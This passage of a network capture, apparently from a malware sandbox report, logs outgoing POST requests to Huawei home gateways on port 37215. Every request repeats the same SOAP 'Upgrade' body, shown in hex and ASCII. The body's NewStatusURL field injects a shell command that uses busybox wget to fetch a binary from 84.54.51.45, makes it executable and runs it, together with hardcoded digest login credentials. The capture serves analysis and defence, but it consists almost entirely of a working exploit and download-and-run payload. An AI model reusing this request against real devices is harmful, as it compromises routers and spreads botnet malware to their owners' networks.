                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            305192.168.2.1539460197.161.158.16337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.183446884 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            306192.168.2.1550898197.213.10.7637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.183501959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            307192.168.2.1560262197.92.210.4537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780209064 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            308192.168.2.1554374197.145.149.12237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780230045 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            309192.168.2.1560218197.140.208.16337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780251980 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            310192.168.2.1534972197.193.133.24737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780297041 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            311192.168.2.1543764197.114.84.2737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780309916 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            312192.168.2.1534074197.4.105.25337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780333042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            313192.168.2.1542430197.219.96.15137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780359030 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            314192.168.2.1542250197.134.226.17637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780385971 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
